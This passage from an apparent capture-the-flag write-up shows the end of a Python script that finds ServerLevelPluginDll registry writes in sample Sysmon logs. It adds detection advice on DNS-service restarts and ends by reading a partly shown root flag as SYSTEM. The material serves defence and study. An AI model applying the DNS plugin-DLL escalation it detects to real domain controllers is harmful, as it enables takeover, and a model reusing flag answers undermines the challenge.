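  <Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\BootMethod</Data>
  <Data Name="Details">DWORD (0x00000003)</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>1</EventID><Computer>Resolute.megabank.local</Computer></System>
 <EventData><Data Name="Image">C:\Windows\System32\dnscmd.exe</Data></EventData>
</Event>
</Events>
"""

if __name__ == "__main__":
    for f in find_plugin_dll_writes(SAMPLE_SYSMON):
        print(f"[{f['severity']}] {f['time']} {f['computer']} {f['image']} -> {f['details']!r}")
```

Pair this with a watch on DNS service restarts on domain controllers: a ServerLevelPluginDll write followed within minutes by a stop/start of the dns service, issued by an account that is not a DNS administrator by job function, is the whole attack in two events.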
Flag
With a shell as SYSTEM you can simply type the root flag:
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d948...